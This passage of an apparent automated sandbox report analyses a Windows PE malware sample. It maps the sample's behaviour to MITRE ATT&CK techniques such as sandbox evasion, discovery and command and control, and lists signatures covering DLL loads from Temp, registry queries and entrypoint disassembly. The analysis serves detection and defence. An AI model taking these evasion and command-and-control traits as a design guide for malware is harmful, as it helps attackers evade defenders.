"T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\gfiyttnoixhvefhxpxbbadt\"\n \"gfiyttnoixhvefhxpxbbadt\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927\" file has an entrypoint instructions - \"push\t0x60,push\t0x42b7f0,call\t0x421c1c,mov\tedi, 0x94,mov\teax, edi,call\t0x4216d0,mov\tdword ptr [ebp - 0x18], esp,mov\tesi, esp,mov\tdword ptr [esi], edi,push\tesi,call\tdword ptr [0x42a080],mov\tecx, dword ptr [esi + 0x10],mov\tdword ptr [0x463a70], ecx,mov\teax, dword ptr [esi + 4],mov\tdword ptr [0x463a7c], eax,mov\tedx, dword ptr [esi + 8],mov\tdword ptr [0x463a80], edx,mov\tesi, dword ptr [esi + 0xc],and\tesi, 0x7fff,mov\tdword ptr [0x463a74], esi,cmp\tecx, 2,je\t0x4224da,or\tesi, 0x8000,mov\tdword ptr [0x463a74], esi,shl\teax, 8,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" called \"CreateDirectoryA\" (UID: 00000000-00006048)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70880000\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" loaded module \"KERNEL32\" at base 76570000\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d60000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006048)\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006048)\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006048)\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006048)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76140000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927\" was detected as \"Microsoft visual C++ 7.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to access non-existent file \"C:\\VERSION.dll\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to access non-existent file \"C:\\netapi32.dll\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to access non-existent file \"C:\\netutils.dll\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to access non-existent file \"C:\\srvcli.dll\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to access non-existent file \"C:\\wkscli.dll\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to access non-existent file \"C:\\SCHEDCLI.DLL\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to access non-existent file \"C:\\iphlpapi.dll\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\VERSION.dll\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\Windows\\system32\\VERSION.dll\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\netapi32.dll\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\Windows\\system32\\netapi32.dll\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\netutils.dll\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\Windows\\system32\\netutils.dll\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\srvcli.dll\"\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" trying to touch file \"C:\\Windows\\system32\\srvcli.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"0844A7218502246830AF66AFBB13795B1E35F5DFFD756A9CEED8B526E71FE927\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANWORKSTATION\\PARAMETERS\"; Key: \"RPCCACHETIMEOUT\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"ENABLELUA\"; Value: \"\")\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" queries volume information of \"C:\\\" at 00000000-00006048-0000010C-118197", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" queries volume information of \"C:\\\" at 00000000-00006048-0000010C-118197", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" called \"IsWow64Process\" with parameter \"6048\" - (UID: 00000000-00006048)\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" called \"IsWow64Process\" (UID: 00000000-00006048)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006048)\n \"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" called \"RtlGetVersion\" (UID: 00000000-00006048)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"0844a7218502246830af66afbb13795b1e35f5dffd756a9ceed8b526e71fe927.exe\" (Path: 